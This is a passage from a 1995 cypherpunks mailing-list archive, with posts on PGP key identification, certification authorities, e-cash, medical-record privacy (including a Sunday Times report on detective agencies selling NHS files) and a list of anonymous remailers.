too use various information technologies daily to buy products via their
credit cards, to transfer funds, to buy stocks, and to browse through
electronic catalogues. We are entering a new era in electronic commerce
characterized by firms and customers conducting business on the Internet
spontaneously, on a 24-hour basis and worldwide.  With the phenomenal
growth of the Internet a unique and new electronic market place is
evolving. Various estimates (ranging from 10 million to over one billion)
have been advanced in terms of the total number of people who will be
connected to computer networks as they expand to include telephones,
televisions, computers, as well as a range of intelligent devices such as
the 'market choice box'.

Electronic commerce is expected to grow in various forms such as
electronic data interchange and various multimedia services such as
interactive television and home shopping, multimedia kiosks and
cable-based video-on-demand services. Off-shoots may be desk-top
video-conferencing and computer networks affecting the way we communicate
and the overall need to travel.

When overlaying and projecting many of these and future electronic
commerce activities on the envisioned National and Global Information
Highway, it is indeed astonishing to fathom the future potential for
commerce and economic performance.  At the same time, however, we can
recognize potential social, organizational and societal limits and
dysfunctions. How is the availability and use of the Internet changing
commerce as we know it? Given many uncertainties, how can we reliably and
empirically estimate the number of potential electronic commerce users on
the Internet (in an effort to separate grounded analysis and projections from
hype)? Will electronic markets provide new areas of opportunity for
retailers, producers and consumers?  How will future traffic on the
Information Highway affect each segment of an industry value chain?  How
will such forseeable developments impact the consumer and society in
general? If electronic markets lower transaction costs for producers and
retailers, will consumers gain by accessing manufacturers directly via
market makers? What do electronic commerce developments mean from a
marketing perspective and for customer relationships? What are the impacts
of the emergence of widespread information technology use and worldwide
electronic networks (e. g., the World Wide Web) on electronic commerce and
markets in general?  Can we envision electronic forms for payment such as
digital cash on the Internet?  What may be the potential impact of
electronic cash on the economy, banks, and nations' equivalent of federal
reserve systems? What is the role of government in electronic commerce
developments and what policy directions ought to be addressed?

This special issue intends to embrace a wide and rich array of electronic
commerce issues.  We would like to focus on "commerce," not just
transactions, implying that commerce denotes a larger process including
aspects of information seeking and distribution, negotiation, trust,
risk-taking, customer relationships, buyers finding sellers, sellers finding
customers, after-sale service and support. Although we are interested in
transaction processing concerns within and between firms and within
markets, we would also like to address important and essential social and
behavioral issues in this setting, without which no effective commerce is
possible. Moreover, we are interested in work and organizational issues
embedded in electronic commerce and what they mean and imply inside the
organization.  In addition, we would like to explore how these electronic
commerce issues relate to the marketing perspective, such as in
relationships between firms and customers/clients.

_The Information Society_ journal, published since 1981, is a key forum
for thoughtful analysis of the impacts, policies, system concepts,
methodologies and cultural change related to trends that may be described
as the "information technology revolution."  It is a refereed journal
publishing scholarly articles, position papers, short communications and
book reviews.

_The Information Society_ is a multidisciplinary journal whose audiences
include policy- and decision-makers and scientists in government,
industry and education; managers concerned with the effects of the
information revolution on individuals, organizations and society; and
shcolars with an interest in the relationship between information
technologies, social/organizational life, and social change. A general
description of the journal can be found at the following URL:
        http://www.ics.uci.edu/~kling/tis.html

For this special issue on "Electronic Commerce" and, in general, _The
Information Society_ is interested in provocative analytical articles or
empirical studies that are written to advance our understanding of the
relationships among information technology, related social practices and
policies, and social change. _TIS_ articles are typically 4,000 to 6,000
words long, and are written vividly with coherent analyses and minimal
jargon.

For manuscript format details, look at the following URL:
        http://www.ics.uci.edu/~kling/tisinst.html
You may also contact the editor or see the inside back cover of an issue
of the journal. Authors of manuscripts for this issue on "Electronic
Commerce" should send
four copies to the guest editor no later than January 15, 1996:

        Rolf T. Wigand, Ph. D.
        Guest Editor, _TIS_
        School of Information Studies
        4-293 Center for Science and Technology
        Syracuse University
        Syracuse, NY 13244-4100, USA
        Telephone: +315-443-5608;  Fax: +315-443-5806
        E-Mail: rwigand@syr.edu

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 27 Nov 1995 04:46:34 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <v02120d05acde7ef59f48@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Is this another one of those LD tentacles? ;)

Must that or a spoof of somekind... "She" didn't sign it, and "she" claims
to have issued a signature...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sun, 26 Nov 1995 23:52:52 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: [NOISE] Re: crypto for porno users
Message-ID: <Pine.3.89.9511261505.A2182-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 24 Nov 1995, E. ALLEN SMITH wrote:

> consent. For instance, Britain's age for consent depends on the
> type of sexuality involved; heterosexual sex receives a more
> lenient age (18) than homosexual (21).

This is getting distinctly off-topic, but Britain's age of consent is
actually 16 for heterosexual sex, 18 for male homosexuals (unless the
government have changed it back again, they reduced it from 21 a few
months ago), and I think 16 for lesbians. But it's all terribly
complicated, as you pointed out... 

Incidentally, the "Sun" newspaper, one of the most popular in the UK
(sells 3,000,000-4,000,000 copies daily, AFAIR), has often printed
half-page erotic pictures of topless sixteen-year-old girls. Would this be
"kiddie porn"  in the US ?

OBCrypto: Did anyone ever find out which version of A5 is in Applied 
Cryptography ?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 27 Nov 1995 05:28:06 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511262109.NAA29631@jobe.shell.portal.com>
Message-ID: <199511262120.QAA07595@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Someone spoofing Alice, who is either Detweiler or "Dr." Cohen, says:
> I have never signed any of my posts to this mailing list and frankly have
> no intention of beginning at this point.

Well, signed Alice posts have shown up, so we will just have to assume
that the above was a spoof and that the signed Alice posts are the
real ones, now won't we?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Mon, 27 Nov 1995 06:02:32 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511260953.BAA10105@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951126164434.2346A-100000@kinks>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Sun, 26 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> > 	Its an excellent paper, well worth reading, but the basic
> > problem is that X.509 encrypts before signing.
> 
> You'd rather sign before encryption??
> 
> Doesn't that give you "known plain-text" to attack?  i.e. the signature.
> 
> I'm not sure whether it would or wouldn't, but I'm sure some
> cryptographers here might clear that up mighty quick -- before any more
> harm is allowed, I mean. 

  The paper suggested that you have two different keys, one for 
encryption and the other for signatures, and you don't mix the two up, so 
that way you are protecting yourself from someone forging your 
signature, but you are not letting them know what your private key is.
  Make sense?  I would suggest that you read the paper, as it is really 
an excellent document.

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 27 Nov 1995 07:35:26 +0800
To: cypherpunks@toad.com
Subject: Cyberangels
Message-ID: <01HY3X9A4V748WYKSR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Some may have already seen this, but the Guardian Angels are trying to
intrude onto the net... and are doing so in typical clueless newbie fashion.
See the CUDigest web site for more information; the links to the most
significant issues are:
http://www.soci.niu.edu/~cudigest/CUDS7/cud786 and
http://www.soci.niu.edu/~cudigest/CUDS7/cud791. Some interesting commentary
is also in http://www.soci.niu.edu/~cudigest/CUDS7/cud787. Incidentally, one
way in which they are displaying cluelessness is in taking L.Detweiler
seriously.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 27 Nov 1995 12:15:05 +0800
To: cypherpunks@toad.com
Subject: Re: MED_vac
Message-ID: <199511270405.UAA04239@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 Nov 1995, Adam Shostack wrote:

> 	If you have some personal data that includes your patient
> number, why not have a card that instead lists your important data?
> "This patient is diabetic, alergic to amoxicillin, and has Gold Cross
> insurance." 

I'm confused.  Are you saying that the answer is hardware??  Why I think
someone already thought of that. It's called a MEDIC-ALERT bracelet. 

As someone who's blood type is rare, I can appreciate this.

> 	At Defcon, Bruce Schneier was talking about the value stored
> in casino chips.  Its sttaggering.  Its an alternate cash system, with
> a huge float, astounding velocity, and very little fraud.  Transaction
> costs are low, clearing is instantaneous.  The comparison is fairly
> clear.

I don't see the comparison.

High value "chips" have additional security precautions engineered into
them, over and above low-value chips, hopefully Schneier realizes this.  
There are also regular "counts", in fact perpetual "counts" in all casinos. 

I mean pit bosses and managers have to do something to earn their keep.
(other than handing out comps, I mean.)

There's also an "eye in the sky" lording over you in a casino, and the
"chips" aren't actually "cleared" until you cashout.  I'm not sure how
Schneier got the idea that it was instantaneous clearing, but it isn't by
any stretch of the imagination. 
 
But then what do I know ... I don't even sign my posts with PGP.

> |      So, what if my records were available on the net, but encrypted with a
> | an key known to my physician and an escrow agency? (Equivalently, they
> | could be on that smartcard, but encrypted.) If an emergency occurs, the
> | hospital fetches my encrypted records from my physician's server, then
> | sends a message (signed with the hospital's key) to Keys R Us, the escrow
> | agent, saying "This is Dr. McCoy at Frobnitz Memorial Hospital, we need the
> | key for FooBar Medix, Inc., patient number 147258369." (My FooBar Medix,
> | Inc., insurance card lists my physician's server, the escrow agency, and my

Why bother with having records on the "Net".  What if the net goes down, 
then what??  Where are you left then?  Relying on technology, simply 
because something CAN be done is very bad practice, when its not needed. 

When I travelled in the States, I simply kept a copy of my travel 
documents in my wallet.  I never had any problem.  And I had a copy of my 
pertinent medical data, attached via a MEDIC-ALERT bracelet to my body.

Then again, the amount of information that you want a doctor reading over
when you do have an emergency is minimal.  You really want the doctor to
act, not to get to know all of the details which aren't relevant to your
treatment. 

There's no need to overload someone, you simply have to give someone the
resources they need in order to get the job done. And that is the 
critical point, isn't it??  Getting the job done, and giving someone 
what's needed to do so.

> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Instituto Latinoamericano de Computacion <ilaccr@sol.racsa.co.cr>
Date: Mon, 27 Nov 1995 10:32:39 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9511261423.AA01203@sol.racsa.co.cr>
MIME-Version: 1.0
Content-Type: text/plain


Hey What's up,my name is Herbert Salas,I live in Costa Rica,I would like to know
everything you can about hacking.I've tried to find here something,but I
can't find anything here,how they do to encrypt things,and how can you crack
it,what do I need,Software,Hardware,Where can I get it.??Help.
Thanks.
Herbert Salas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 28 Nov 1995 12:44:49 +0800
To: Raph Levien <cypherpunks@toad.com
Subject: Re: The future will be easy to use
Message-ID: <199511280435.UAA08732@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 AM 11/27/95 -0800, Raph Levien wrote:
> As I see it, any system that does must have the following 
> properties:
>
>   * Some variant on the Web of Trust.
>
>   * Online key-servers for getting keys in real time.
>
>   * A clean mechanism for validating keys through alternate channels.
>
>   There are three possible outcomes: we build it, the NSA builds it, or 
> Microsoft/Netscape builds it. 

Specs, anyone?

I suggest a few requirements:

Store the keys, and information about the keys in a *real* database
(for windows apps, we can redistribute the Microsoft access and or
the paradox database engines royalty free, and drive them through 
ODBC to minimize dependency on specific vendors.)

Support tree of authentification:  A key that is *named* Peter by Sam,  
or *named* Informix Corporation by the Delaware corporate registrar, shall
be considered equivalent to any other key given the same name by same
authority, whether that authority be Dark Unicorn, or the state of
Delaware.

This last property is essential if PGP keys are to be used as a
basis for exchanging promises to pay and directives to pay.

A very common use of this feature, pending the development of
user friendly software that makes every man is own bank and his
own credit rating agency, would be as follows:  Sam generates a long
key on a clean off line computer:  He uses it to name itself Sam and to
name several shorter keys "Sam".  He then puts the private long key 
on a floppy disk and buries it in a hole in the ground along with 
his gold and his stash of SKS ammo, and most likely never uses
it again.  He publishes the long public key, and uses
the shorter private keys for actual encryption.  From time to time, 
he changes keys, without any disruption or inconvenience.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 27 Nov 1995 13:59:37 +0800
To: Norman Hardy <norm@netcom.com>
Subject: Re: Elliptic curves, current status?
In-Reply-To: <acde968205021004b44c@DialupEudora>
Message-ID: <Pine.SUN.3.91.951126213017.7378B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 26 Nov 1995, Norman Hardy wrote:

> There are many parameters to an elliptic curve crypto system.
> I haven't seen any taxonomy of which kinds are good and which
> have been shown to be week. In contrast there seems to be a
> consensus about how to pick primes for RSA or Diffie-Hellman.

The IEEE p1363 group's working draft on elliptic curve standard may help 
you here.  You can find it at ftp://ftp.rsa.com/pub/p1363/draft/ec.ps

One reason for confusion about the speed of elliptic curve cryptosystems is 
the small number of implementations.  A paper in Crypto 95 claimed that 
for doing key exchange, an elliptic curve algorithm takes about the same 
time and has about the same level of security as DH with 512 bit modulus, 
and that elliptic curve has a speed advantage if greater security is 
desired.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 27 Nov 1995 06:06:33 +0800
To: cypherpunks@toad.com
Subject: Re: Junk E-Mail - Part 4
Message-ID: <199511262156.WAA27898@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Alice:

>Heavens, no.  Than again, I'm waiting for the day that the NY Times 
>allows advertising on its op-ed page.

      It does and has for years and years, every day.
      Maybe you meant the editorial page?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 28 Nov 1995 15:07:11 +0800
To: Jonathan Zamick <raph@c2.org>
Subject: Re: The future will be easy to use
Message-ID: <199511280658.WAA23722@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:12 PM 11/27/95 -0800, Jonathan Zamick wrote:
> it
> means forming a group, made up of Cypherpunk members perhaps, but much
> smaller, and capable of working together. Also capable of handling not only
> the theory, but good solid code, GUI, PR, meetings, talking to the
> government, etc.

Skip the talking to the government bit:  Ignore, do not confront.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 28 Nov 1995 15:39:47 +0800
To: James Black <jps@monad.semcor.com>
Subject: Re: The future will be easy to use
Message-ID: <199511280731.XAA11527@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:38 PM 11/27/95 -0500, James Black wrote:

>  As soon as PGP 3.0 is released I am planning on incorporating PGP into 
>Pine, and start putting it into more programs, to increase the usage of 
>encryption things before they go out.

Is there any public spec for PGP 3.0?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 28 Nov 1995 02:09:51 +0800
To: Thomas E Zerucha <norm@netcom.com>
Subject: Re: Virus attacks on PGP
Message-ID: <199511270737.XAA20199@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 11/26/95 -0800, Thomas E Zerucha wrote:
>That woudl be interesting - even with the speaker "off" the power surge 
>causes clicking and other signs.  Not to mention that the interrupt count 
>would start moving (of course the virus could replace the entire OS and 
>would only have to find 300K chunks to hide in).

I looked at the memory usage on my 1meg Mac and 5meg is used for the
system.  I have no idea what it is all being used for.  A lot can hide
there.

Bill Frantz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 27 Nov 1995 15:53:45 +0800
To: John Gilmore <cypherpunks@toad.com
Subject: Re: Bitbux could eliminate some domestic currencies?
Message-ID: <199511270737.XAA20225@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:21 11/23/95 -0800, John Gilmore wrote:
>>From a letter in [My dog, I mean my software, ate this part of the msg -- gnu]
>...
>"The importance of e-money replacing cash is greater than possible effects
>on exchange rates. Rather, it might make certain currencies to all intents
>and purposes disappear."

Gresham's law says that the bad money drives the good money out of
circulation.  Does this mean that real cash is better than ecash ;-).

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@clark.net
Date: Mon, 27 Nov 1995 14:20:13 +0800
To: Greg_Rose@sydney.sterling.com
Subject: Re: establishing trust
Message-ID: <199511270516.AAA05126@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Greg,

>Subject: Re: establishing trust 
>Date: Mon, 27 Nov 95 12:20:47 +1000
>
>-----BEGIN PGP SIGNED MESSAGE-----

Did you intentionally not provide the same key that this was signed with?
I added the key you provided, but PGP still couldn't find the right key for
this signature.

>  from the same person.  I even know who they came from:  the person who
>  is capable of signing with key 0xXXXXXXXX.
>
>I hate to point this out, but that isn't true.
>Anyone can create a key with any chosen keyid and
>attach the same publicly known name to it.

Of course -- sloppiness on my part -- trying to minimize my own typing.
Pardon me.  One must use a hash of the key or the key itself to identify it
-- not merely some portion of the modulus -- and the ID field has to be
large enough to rule out a brute force search on the spoofer's part.


The PGP KeyID problem has merely to do with PGP's own access mechanisms.
Successful verification of a signature by some key is linkage enough to
that key.  If multiple messages/files verify by the same key, they are
linked together no matter how the key is identified.  The problem you
identified comes from the fact that PGP doesn't let us know with enough
certainty that the same key was used for two different signatures.

In fact, PGP just tells you the UserID of the key which verified the
signature -- as if that UserID were (a) unique and (b) meaningful.  The
keyID isn't displayed.

For a version of PGP to suit my tastes, the unique UserID would be assigned
by me alone -- and the file of those assignments (called "aliases" in
TIS/MOSS) would be protected under my own signature (or, equivalently,
encrypted under my own conventional key -- the same one protecting my
private keys, perhaps).

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 27 Nov 1995 11:52:36 +0800
To: cypherpunks@toad.com
Subject: For sale: your secret medical records
Message-ID: <199511270120.CAA06893@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The Sunday Times, Top page one, 26 Nov 1995

For sale: your secret medical records for L150

by Lois Rogers and David Leppard

Confidential medical records of politicians, celebrities
and millions of other National Health Service patients
can be bought on the information black market for L150.

The contents of the files comprising patients' most
personal health details dating back 30 years, are being
sold to order by high-street detective agencies
advertising in the Yellow Pages.

The Sunday Times has discovered that GP practices across
Britain are failing to safeguard files which contain
sexual, mental and physical histories of patients. Files
on sale last week revealed how named patients had
vasectomy operations, or had a family history of
Alzheimer's disease and precancerous growths. They also
included the type and dose of medication prescribed,
visits to casualty units, and injuries suffered in road
accidents.

The disclosures have prompted calls by opposition MPs and
doctors' leaders for urgent laws to protect the security
of the health records of Britain's 56.5m patients.

Alan Milburn, a Labour health spokesman, said he would be
asking Stephen Dorrell, the health secretary, to conduct
an urgent inquiry. "This is a violation of the special
relationship between doctors and their patients," said
Milburn. "I find it disturbing and deeply sinister.
Patients will be horrified to learn that their records
can be accessed by unknown organisations."

Alex Carlisle, the Liberal Democrat home affairs
spokesman and a lay member of the General Medical
Council, said: "It is ethically and morally outrageous
that organisations of any kind should obtain details like
that without consent. It is contrary to everything we are
told about the confidentiality of medical records. This
should be a crime punishable by imprisonment."

Milburn and Carlile were among more than a dozen people
who last week allowed The Sunday Times to expose the
security failures in the NHS records system by giving the
newspaper permission to access their confidential files
through commercial agencies.

The problem first came to light when one agency said it
was receiving more and more commissions from big
employers who wanted it to carry discreet checks on the
medical backgrounds of their employees. The agencies,
many of which advertise "private searches" in the Yellow
Pages, offer their services for fees ranging from L150 to
L800.

They offer to provide a written summary of anybody's
complete medical files within three hours. All they
require is the name, address and date of birth of the
patient they are investigating. They are thought to be
able to obtain the records by impersonating medical staff
and persuading them to disclose contents of the NHS files
over the telephone.

Last week a Sunday Times reporter posing as a prospective
client contacted 10 private detective agencies chosen at
random from the Yellow Pages. "Most of this stuff is on
manual records," said one employee of a London agency.
"It is pretty well protected. We're not officially
allowed [to do this] but it's perfectly possible." A
second private investigator said: "It's just a question
of knowing who and what to ask."

However, most declined to discuss the methods they used.
"What we are doing is illegal, and I'm not going into the
details over the telephone," said another agent in
Robertsbridge, East Sussex.

Dr Sandy Macara, chairman of the British Medical
Association council, which represents 105,000 doctors,
was among those who agreed to take part in the exercise.
Details of his medical and surgical history were provided
after a brief telephone call by a reporter to a private
agency. The information was faxed to the newspaper within
three hours, after a price of L150 was quoted. "This is
incredible. I cannot imagine how they have got this
information," Macara said.

The ease with which the health files could be obtained
posed a threat to the Electronic Patients' Records, a new
computer database which will soon contain the files of
all NHS patients in England and Wales, Macara said. "We
will have to ensure the new nationwide computer network
is as secure as humanly possible, and press for a
statutory right to confidentiality of patient
information."

Elizabeth France, the data protection registrar, said the
Criminal Justice Act had recently tightened the law
regarding information obtained by deception. But the
penalties apply only to information held on computer,
rather than medical notes, which at present are held
mainly on hand-written files. "This is something we take
very seriously," France said. "We are actively pursuing
it. It doesn't mean the problems have been solved."

John Wadham, director of Liberty, the civil rights group,
called on the government to introduce a new criminal
offence of obtaining information by deception. "Such
information can obviously include material about sexually
transmitted diseases and material about an individual's
physical and mental health," he said. "There clearly
needs to be a right to privacy so the courts can act
against this."

Baroness Cumberlege, the junior health minister, said
confidentiality remained a cornerstone of the NHS. "We
are about to issue strengthened guidelines for security
of records within hospitals and new measures for
unauthorised access from external sources," she said. "We
are having discussions with the BMA and the Data
Protection Agency specifically about these issues."

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 27 Nov 1995 19:20:22 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951125141719.4185B-100000@dfw.net>
Message-ID: <30B99C34.2A1F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim wrote:
> 
> > Basicly when the browser finds a new CA that it does know about it promts
> > the user and through a series of dialog boxes the user chooses to trust it
> > or not.
> 
> Is anyone running an ssl web server that would let us see how this works?

  A little bird pointed me toward https://www.secret.org.  I have no
idea who they are...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Mon, 27 Nov 1995 18:22:37 +0800
To: cypherpunks@toad.com
Subject: Re: spooky URL
Message-ID: <199511271012.DAA03786@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Nothing spooky about it.
They are an audit-sevice for web pages that is sponsored.
Anytime you access a page this tell them you were accessed.

Love Always,

Carol Anne
ps. you can get an acct. there if you want it.

>
>while visiting  http://www.mcs.com/~candyman/http/boom.html, I noticed that
my Netscape's status line mentions an attempt to connect to:
>
>g1.internet-audit.com
>
>a little spooky... any ideas what is happening??
>
>
>I prefer e-mail. 
>reply (anonymously)     to an197098@anon.penet.fi
>reply (NON-anonymously) to na197098@anon.penet.fi
>
>
>
>
>
>
>
>
>--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
>Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
>Please, report inappropriate use to                abuse@anon.penet.fi
>For information (incl. non-anon reply) write to    help@anon.penet.fi
>If you have any problems, address them to          admin@anon.penet.fi
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 27 Nov 1995 22:29:17 +0800
To: cypherpunks@toad.com
Subject: Re: Register
Message-ID: <199511271420.GAA26643@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On  8 Mar 95 at 22:46, Robert East wrote:

> Register
> 
> I'd like to sign up for email
> 
> Bob


You got it, Bub!  Er, Bob.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 27 Nov 1995 22:59:58 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199511271450.GAA25350@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reorder";
